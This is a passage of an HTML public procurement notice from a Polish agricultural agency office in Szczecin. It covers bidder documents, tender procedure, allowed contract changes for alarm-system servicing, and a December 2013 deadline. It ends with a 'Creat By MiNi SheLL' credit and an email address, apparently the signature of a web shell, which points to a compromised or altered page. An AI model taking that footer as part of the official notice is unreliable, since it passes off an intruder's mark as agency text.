<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. 2. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 poprzez poleganie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 3. W przypadku Wykonawców działających przez pełnomocnika - stosowne pełnomocnictwo wystawione w sposób określony przepisami prawa cywilnego (oryginał lub potwierdzona notarialnie za zgodność z oryginałem kopia).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1) zmiany urzędowej stawki podatku VAT, 
2) zmiany podwykonawców w przypadku korzystania przez Wykonawcę w realizacji zamówienia z podwykonawców,
3) zmiany na skutek wystąpienia zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
- inne zmiany tj. zmiana lokalizacji Biura Powiatowego, zmiana osób wskazanych w umowie uprawnionych do kontaktów. 
Zamawiający zastrzega sobie prawo do zmiany lokalizacji Biur Powiatowych w ramach tego samego powiatu, w takim przypadku postanowienia zawarte w projekcie umowy - załącznik nr 6 do SIWZ nie ulegną zmianie. W przypadku zmiany lokalizacji Zamawiający niezwłocznie pisemnie zawiadomi o tym fakcie Wykonawcę, który zapewni ciągłość wykonywanych świadczeń (po uprzednim zamontowaniu w nowej lokalizacji systemu w ramach odrębnego zamówienia) stanowiących przedmiot zamówienia w danej lokalizacji.      
Zamawiający przewiduje objęcie usługą okresowego przeglądu kwartalnego dodatkowych czujek oraz pozostałych elementów SSWiN w ilości nie więcej niż 5% ilości zainstalowanych czujek, które w ramach potrzeb mogą zostać podłączone do istniejących systemów w obiektach Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Zachodniopomorski Oddział Regionalny ul. Szafera 10, 71-245 Szczecin pok. nr 8A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 12:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa
Zachodniopomorski Oddział Regionalny 
ul. Szafera 10
71-245 Szczecin, Kancelaria pok. nr 19, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com